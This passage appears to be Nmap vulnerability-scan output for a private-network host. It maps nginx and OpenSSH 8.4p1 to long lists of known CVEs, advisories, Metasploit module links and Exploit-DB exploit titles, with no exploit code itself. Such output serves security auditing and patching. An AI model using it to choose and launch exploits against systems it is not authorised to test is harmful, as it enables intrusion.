Restriction privilege escalation [59645] nginx up to 0.8.9 memory corruption [53592] nginx 0.8.36 privilege escalation [53590] nginx up to 0.8.9 information disclosure [51533] nginx 0.7.64 Terminal privilege escalation [50905] nginx up to 0.8.9 directory traversal [50903] nginx up to 0.8.10 memory corruption [50043] nginx up to 0.8.10 memory corruption [67677] nginx up to 1.7.3 SSL privilege escalation [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation [12824] nginx 1.5.10 on 32-bit SPDY memory corruption [12822] nginx up to 1.5.11 SPDY memory corruption [11237] nginx up to 1.5.6 URI String privilege escalation [8671] nginx up to 1.4 proxy_pass privilege escalation [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked Numeric Error [7247] nginx 1.2.6 Proxy Function weak authentication [5293] nginx up to 1.1.18 ngx_http_mp4_module memory corruption [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c denial of service MITRE CVE - https://cve.mitre.org: [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028. [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow. [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors. [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file. [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response. [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence. [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI. [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator. [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method. [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI. [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests. SecurityFocus - https://www.securityfocus.com/bid/: [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability [90967] nginx CVE-2016-4450 Denial of Service Vulnerability [82230] nginx Multiple Denial of Service Vulnerabilities [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability [69111] nginx SMTP Proxy Remote Command Injection Vulnerability [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability [59824] Nginx CVE-2013-2070 Remote Security Vulnerability [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability [58105] Nginx 'access.log' Insecure File Permissions Vulnerability [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability [55920] nginx CVE-2011-4963 Security Bypass Vulnerability [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [40434] nginx Space String Remote Source Code Disclosure Vulnerability [40420] nginx Directory Traversal Vulnerability [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions [84172] nginx denial of service [84048] nginx buffer overflow [83923] nginx ngx_http_close_connection() integer overflow [83688] nginx null byte code execution [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass [82319] nginx access.log information disclosure [80952] nginx SSL spoofing [77244] nginx and Microsoft Windows request security bypass [76778] Naxsi module for Nginx nx_extract.py directory traversal [74831] nginx ngx_http_mp4_module.c buffer overflow [74191] nginx ngx_cpystrn() information disclosure [74045] nginx header response information disclosure [71355] nginx ngx_resolver_copy() buffer overflow [59370] nginx characters denial of service [59369] nginx DATA source code disclosure [59047] nginx space source code disclosure [58966] nginx unspecified directory traversal [54025] nginx ngx_http_parse.c denial of service [53431] nginx WebDAV component directory traversal [53328] Nginx CRC-32 cached domain name spoofing [53250] Nginx ngx_http_parse_complex_uri() function code execution Exploit-DB - https://www.exploit-db.com: [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow [25499] nginx 1.3.9-1.4.0 DoS PoC [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection [14830] nginx 0.6.38 - Heap Corruption Exploit [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities [12804] nginx [engine x] http server <= 0.6.36 Path Draversal [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC [9829] nginx 0.7.61 WebDAV directory traversal OpenVAS (Nessus) - http://www.openvas.org: [864418] Fedora Update for nginx FEDORA-2012-3846 [864310] Fedora Update for nginx FEDORA-2012-6238 [864209] Fedora Update for nginx FEDORA-2012-6411 [864204] Fedora Update for nginx FEDORA-2012-6371 [864121] Fedora Update for nginx FEDORA-2012-4006 [864115] Fedora Update for nginx FEDORA-2012-3991 [864065] Fedora Update for nginx FEDORA-2011-16075 [863654] Fedora Update for nginx FEDORA-2011-16110 [861232] Fedora Update for nginx FEDORA-2007-1158 [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx) [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx) [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [100659] nginx Directory Traversal Vulnerability [100658] nginx Space String Remote Source Code Disclosure Vulnerability [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities [71574] Gentoo Security Advisory GLSA 201206-07 (nginx) [71308] Gentoo Security Advisory GLSA 201203-22 (nginx) [71297] FreeBSD Ports: nginx [71276] FreeBSD Ports: nginx [71239] Debian Security Advisory DSA 2434-1 (nginx) [66451] Fedora Core 11 FEDORA-2009-12782 (nginx) [66450] Fedora Core 10 FEDORA-2009-12775 (nginx) [66449] Fedora Core 12 FEDORA-2009-12750 (nginx) [64924] Gentoo Security Advisory GLSA 200909-18 (nginx) [64912] Fedora Core 10 FEDORA-2009-9652 (nginx) [64911] Fedora Core 11 FEDORA-2009-9630 (nginx) [64894] FreeBSD Ports: nginx [64869] Debian Security Advisory DSA 1884-1 (nginx) SecurityTracker - https://www.securitytracker.com: [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents OSVDB - http://www.osvdb.org: [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow [92796] nginx ngx_http_close_connection Function Crafted r-&gt [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution [90518] nginx Log Directory Permission Weakness Local Information Disclosure [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62617] nginx Internal DNS Cache Poisoning Weakness [61779] nginx HTTP Request Escape Sequence Terminal Command Injection [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write [58128] nginx ngx_http_parse_complex_uri() Function Underflow [44447] nginx (engine x) msie_refresh Directive Unspecified XSS [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal [44443] nginx (engine x) rtsig Method Signal Queue Overflow [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow

Misc Metrics (click to expand)

192.168.3.2(online)

Address

192.168.3.2 (ipv4)

Ports

The 993 ports scanned but not shown below are in state: filtered

993 ports replied with: no-response

Port		State (toggle closed [2] \| filtered [0])	Service	Reason	Product	Version	Extra info
20	tcp	closed	ftp-data	reset
21	tcp	closed	ftp	reset
22	tcp	open	ssh	syn-ack	OpenSSH	8.4p1 Debian 5	protocol 2.0
	vulners	cpe:/a:openbsd:openssh:8.4p1: MSF:ILITIES/GENTOO-LINUX-CVE-2021-28041/ 4.6 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2021-28041/ EXPLOIT CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ EXPLOIT MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ EXPLOIT CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012 CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
	vulscan	VulDB - https://vuldb.com: [170814] OpenSSH up to 8.4 ssh-agent double free [158983] OpenSSH up to 8.3p1 scp scp.c privilege escalation [157436] OpenSSH up to 8.3 Algorithm Negotiation information disclosure [155909] OpenSSH 8.2 scp Client privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632. [CVE-2007-4654] Unspecified vulnerability in SSHield 1.6.1 with OpenSSH 3.0.2p1 on Cisco WebNS 8.20.0.1 on Cisco Content Services Switch (CSS) series 11000 devices allows remote attackers to cause a denial of service (connection slot exhaustion and device crash) via a series of large packets designed to exploit the SSH CRC32 attack detection overflow (CVE-2001-0144), possibly a related issue to CVE-2002-1024. [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6. SecurityFocus - https://www.securityfocus.com/bid/: [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability [92210] OpenSSH CBC Padding Weak Encryption Security Weakness [92209] OpenSSH MAC Verification Security Bypass Vulnerability [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities [75990] OpenSSH Login Handling Security Bypass Weakness [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities [66459] OpenSSH Certificate Validation Security Bypass Vulnerability [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability [61286] OpenSSH Remote Denial of Service Vulnerability [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [45304] OpenSSH J-PAKE Security Bypass Vulnerability [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability [32319] OpenSSH CBC Mode Information Disclosure Vulnerability [30794] Red Hat OpenSSH Backdoor Vulnerability [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability [28531] OpenSSH ForceCommand Command Execution Weakness [28444] OpenSSH X Connections Session Hijacking Vulnerability [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability [20956] OpenSSH Privilege Separation Key Signature Weakness [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability [16892] OpenSSH Remote PAM Denial Of Service Vulnerability [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness [8677] Multiple Portable OpenSSH PAM Vulnerabilities [8628] OpenSSH Buffer Mismanagement Vulnerabilities [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness [6168] OpenSSH Visible Password Vulnerability [5374] OpenSSH Trojan Horse Vulnerability [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [4241] OpenSSH Channel Code Off-By-One Vulnerability [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability [2917] OpenSSH PAM Session Evasion Vulnerability [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability [2356] OpenSSH Private Key Authentication Check Vulnerability [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability [1334] OpenSSH UseLogin Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [83258] GSI-OpenSSH auth-pam.c security bypass [82781] OpenSSH time limit denial of service [82231] OpenSSH pam_ssh_agent_auth PAM code execution [74809] OpenSSH ssh_gssapi_parse_ename denial of service [72756] Debian openssh-server commands information disclosure [68339] OpenSSH pam_thread buffer overflow [67264] OpenSSH ssh-keysign unauthorized access [65910] OpenSSH remote_glob function denial of service [65163] OpenSSH certificate information disclosure [64387] OpenSSH J-PAKE security bypass [63337] Cisco Unified Videoconferencing OpenSSH weak security [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure [45202] OpenSSH signal handler denial of service [44747] RHEL OpenSSH backdoor [44280] OpenSSH PermitRootLogin information disclosure [44279] OpenSSH sshd weak security [44037] OpenSSH sshd SELinux role unauthorized access [43940] OpenSSH X11 forwarding information disclosure [41549] OpenSSH ForceCommand directive security bypass [41438] OpenSSH sshd session hijacking [40897] OpenSSH known_hosts weak security [40587] OpenSSH username weak security [37371] OpenSSH username data manipulation [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed [37112] RHSA update for OpenSSH signal handler race condition not installed [37107] RHSA update for OpenSSH identical block denial of service not installed [36637] OpenSSH X11 cookie privilege escalation [35167] OpenSSH packet.c newkeys[mode] denial of service [34490] OpenSSH OPIE information disclosure [33794] OpenSSH ChallengeResponseAuthentication information disclosure [32975] Apple Mac OS X OpenSSH denial of service [32387] RHSA-2006:0738 updates for openssh not installed [32359] RHSA-2006:0697 updates for openssh not installed [32230] RHSA-2006:0298 updates for openssh not installed [32132] RHSA-2006:0044 updates for openssh not installed [30120] OpenSSH privilege separation monitor authentication verification weakness [29255] OpenSSH GSSAPI user enumeration [29254] OpenSSH signal handler race condition [29158] OpenSSH identical block denial of service [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service [25116] OpenSSH OpenPAM denial of service [24305] OpenSSH SCP shell expansion command execution [22665] RHSA-2005:106 updates for openssh not installed [22117] OpenSSH GSSAPI allows elevated privileges [22115] OpenSSH GatewayPorts security bypass [20930] OpenSSH sshd.c LoginGraceTime denial of service [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service [17213] OpenSSH allows port bouncing attacks [16323] OpenSSH scp file overwrite [13797] OpenSSH PAM information leak [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack [13264] OpenSSH PAM code could allow an attacker to gain access [13215] OpenSSH buffer management errors could allow an attacker to execute code [13214] OpenSSH memory vulnerabilities [13191] OpenSSH large packet buffer overflow [12196] OpenSSH could allow an attacker to bypass login restrictions [11970] OpenSSH could allow an attacker to obtain valid administrative account [11902] OpenSSH PAM support enabled information leak [9803] OpenSSH &quot [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse [9307] OpenSSH is running on the system [9169] OpenSSH &quot [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database [8383] OpenSSH off-by-one error in channel code [7647] OpenSSH UseLogin option arbitrary code execution [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges [7179] OpenSSH source IP access control bypass [6757] OpenSSH &quot [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files [6084] OpenSSH 2.3.1 allows remote users to bypass authentication [5517] OpenSSH allows unauthorized access to resources [4646] OpenSSH UseLogin option allows remote users to execute commands as root Exploit-DB - https://www.exploit-db.com: [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth) [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh) [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool OpenVAS (Nessus) - http://www.openvas.org: [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability [900179] OpenSSH CBC Mode Information Disclosure Vulnerability [881183] CentOS Update for openssh CESA-2012:0884 centos6 [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386 [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386 [870763] RedHat Update for openssh RHSA-2012:0884-04 [870129] RedHat Update for openssh RHSA-2008:0855-01 [861813] Fedora Update for openssh FEDORA-2010-5429 [861319] Fedora Update for openssh FEDORA-2007-395 [861170] Fedora Update for openssh FEDORA-2007-394 [861012] Fedora Update for openssh FEDORA-2007-715 [840345] Ubuntu Update for openssh vulnerability USN-597-1 [840300] Ubuntu Update for openssh update USN-612-5 [840271] Ubuntu Update for openssh vulnerability USN-612-2 [840268] Ubuntu Update for openssh update USN-612-7 [840259] Ubuntu Update for openssh vulnerabilities USN-649-1 [840214] Ubuntu Update for openssh vulnerability USN-566-1 [831074] Mandriva Update for openssh MDVA-2010:162 (openssh) [830929] Mandriva Update for openssh MDVA-2010:090 (openssh) [830807] Mandriva Update for openssh MDVA-2010:026 (openssh) [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh) [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh) [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt) [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh) [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [100584] OpenSSH X Connections Session Hijacking Vulnerability [100153] OpenSSH CBC Mode Information Disclosure Vulnerability [66170] CentOS Security Advisory CESA-2009:1470 (openssh) [65987] SLES10: Security update for OpenSSH [65819] SLES10: Security update for OpenSSH [65514] SLES9: Security update for OpenSSH [65513] SLES9: Security update for OpenSSH [65334] SLES9: Security update for OpenSSH [65248] SLES9: Security update for OpenSSH [65218] SLES9: Security update for OpenSSH [65169] SLES9: Security update for openssh,openssh-askpass [65126] SLES9: Security update for OpenSSH [65019] SLES9: Security update for OpenSSH [65015] SLES9: Security update for OpenSSH [64931] CentOS Security Advisory CESA-2009:1287 (openssh) [61639] Debian Security Advisory DSA 1638-1 (openssh) [61030] Debian Security Advisory DSA 1576-2 (openssh) [61029] Debian Security Advisory DSA 1576-1 (openssh) [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc) [60803] Gentoo Security Advisory GLSA 200804-03 (openssh) [60667] Slackware Advisory SSA:2008-095-01 openssh [59014] Slackware Advisory SSA:2007-255-01 openssh [58741] Gentoo Security Advisory GLSA 200711-02 (openssh) [57919] Gentoo Security Advisory GLSA 200611-06 (openssh) [57895] Gentoo Security Advisory GLSA 200609-17 (openssh) [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6)) [57492] Slackware Advisory SSA:2006-272-02 openssh [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5) [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc) [57470] FreeBSD Ports: openssh [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc) [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH) [56294] Slackware Advisory SSA:2006-045-06 openssh [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again [53788] Debian Security Advisory DSA 025-1 (openssh) [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc) [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc) [11343] OpenSSH Client Unauthorized Remote Forwarding 